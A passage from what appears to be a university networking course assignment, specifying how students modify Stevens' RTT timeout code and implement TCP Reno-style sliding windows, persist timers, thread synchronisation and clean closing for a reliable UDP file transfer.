the unprrt.h header file (Fig. 22.10) set : RTT_RXTMIN to 1000 msec. (1 sec. instead of the current value 3 sec.) RTT_RXTMAX to 3000 msec. (3 sec. instead of the current value 60 sec.) RTT_MAXNREXMT to 12 (instead of the current value 3) In function rtt_timeout (Fig. 22.14), after doubling the RTO in line 86, pass its value through the function rtt_minmax of Fig. 22.11 (somewhat along the lines of what is done in line 77 of rtt_stop, Fig. 22.13). Finally, note that with the modification to integer calculation of the smoothed RTT and its variation, and given the small RTT values you will experience on the cs / sbpub network, these calculations should probably now be done on a millisecond or even microsecond scale (rather than in seconds, as is the case with Stevens’ code). Otherwise, small measured RTTs could show up as 0 on a scale of seconds, yielding a negative result when we subtract the smoothed RTT from the measured RTT (line 72 of rtt_stop, Fig. 22.13). Report the details of your modifications to the code of Section 22.5 in the ReadMe file which you hand in with your code. We need to have a sender sliding window mechanism for the retransmission of lost datagrams; and a receiver sliding window in order to ensure correct sequencing of received file contents, and some measure of flow control. You should implement something based on TCP Reno’s mechanisms, with cumulative acknowledgments, receiver window advertisements, and a congestion control mechanism I will explain in detail in class. For a reference on TCP’s mechanisms generally, see W. Richard Stevens, TCP/IP Illustrated, Volume 1 , especially Sections 20.2 - 20.4 of Chapter 20 , and Sections 21.1 - 21.8 of Chapter 21 . Bear in mind that our sequence numbers should count datagrams, not bytes as in TCP. Remember that the sender and receiver window sizes have to be set according to the argument values in client.in and server.in, respectively. Whenever the sender window becomes full and so ‘locks’, the server should print out a message to that effect on stdout. Similarly, whenever the receiver window ‘locks’, the client should print out a message on stdout. Be aware of the potential for deadlock when the receiver window ‘locks’. This situation is handled by having the receiver process send a duplicate ACK which acts as a window update when its window opens again (see Figure 20.3 and the discussion about it in TCP/IP Illustrated). However, this is not enough, because ACKs are not backed up by a timeout mechanism in the event they are lost. So we will also need to implement a persist timer driving window probes in the sender process (see Sections 22.1 & 22.2 in Chapter 22 of TCP/IP Illustrated). Note that you do not have to worry about the Silly Window Syndrome discussed in Section 22.3 of TCP/IP Illustrated since the receiver process consumes ‘full sized’ 512-byte messages from the receiver buffer (see 3. below). Report on the details of the ARQ mechanism you implemented in the ReadMe file you hand in. Indeed, you should report on all the TCP mechanisms you implemented in the ReadMe file, both the ones discussed here, and the ones I will be discussing in class. Make your datagram payload a fixed 512 bytes, inclusive of the file transfer protocol header (which must, at the very least, carry: the sequence number of the datagram; ACKs; and advertised window notifications). The client reads the file contents in its receive buffer and prints them out on stdout using a separate thread. This thread sits in a repetitive loop till all the file contents have been printed out, doing the following. It samples from an exponential distribution with mean µ milliseconds (read from the client.in file), sleeps for that number of milliseconds; wakes up to read and print all in-order file contents available in the receive buffer at that point; samples again from the exponential distribution; sleeps; and so on. The formula -1 × µ × ln( random( ) ) , where ln is the natural logarithm, yields variates from an exponential distribution with mean µ, based on the uniformly-distributed variates over ( 0 , 1 ) returned by random(). Note that you will need to implement some sort of mutual exclusion/semaphore mechanism on the client side so that the thread that sleeps and wakes up to consume from the receive buffer is not updating the state variables of the buffer at the same time as the main thread reading from the socket and depositing into the buffer is doing the same. Furthermore, we need to ensure that the main thread does not effectively monopolize the semaphore (and thus lock out for prolonged periods of time) the sleeping thread when the latter wakes up. See the textbook, Section 26.7, ‘Mutexes: Mutual Exclusion’, pp.697-701. You might also find Section 26.8, ‘Condition Variables’, pp.701-705, useful. You will need to devise some way by which the sender can notify the receiver when it has sent the last datagram of the file transfer, without the receiver mistaking that EOF marker as part of the file contents. (Also, note that the last data segment could be a “short” segment of less than 512 bytes – your client needs to be able to handle this correctly somehow.) When the sender receives an ACK for the last datagram of the transfer, the (child) server terminates. The parent server has to take care of cleaning up zombie children. Note that if we want a clean closing, the client process cannot simply terminate when the receiver ACKs the last datagram. This ACK could be lost, which would leave the (child) server process ‘hanging’, timing out, and retransmitting the last datagram. TCP attempts to deal with this problem by means of the TIME_WAIT state. You should have your receiver process behave similarly, sticking around in something akin to a TIME_WAIT state in case in case it needs to retransmit the ACK. In the ReadMe file you hand in, report on how you dealt with the issues raised here: sender notifying receiver of the last datagram, clean closing, and so on. Output Some of the output required from your program has been described in the section Operation above. I expect you to provide further output – clear, well-structured, well-laid-out, concise but sufficient and helpful – in the client and server windows by means of which we can trace the correct evolution of your TCP’s behaviour in all its intricacies : information (e.g., sequence number) on datagrams and acks sent and dropped, window advertisements, datagram retransmissions (and why : dup acks or RTO); entering/exiting Slow Start and Congestion Avoidance, ssthresh and cwnd values; sender and receiver windows locking/unlocking; etc., etc. . . . . The onus is on you to convince us that the TCP mechanisms you implemented are working correctly. Too many students do not put sufficient thought, creative imagination, time or effort into this. It is not the TA’s nor my responsibility to sit staring at an essentially blank screen, trying to summon up our paranormal psychology skills to figure out if your TCP implementation is really working correctly in all its very intricate aspects, simply because the transferred file seems to be printing o.k. in the client window. Nor is it our responsibility to strain our eyes and our patience wading through a mountain of obscure, ill-structured, hyper-messy, debugging-style output because, for example, your effort-conserving concept of what is ‘suitable’ is to dump your debugging output on us, relevant, irrelevant, and everything in between.
andriksantos / KeeboxWelcome to KEEBOX LIST™, a carefully curated collection of essential resources for developers. This site is designed to be your centralized reference point, helping you quickly find tools, libraries, and guides relevant to your work.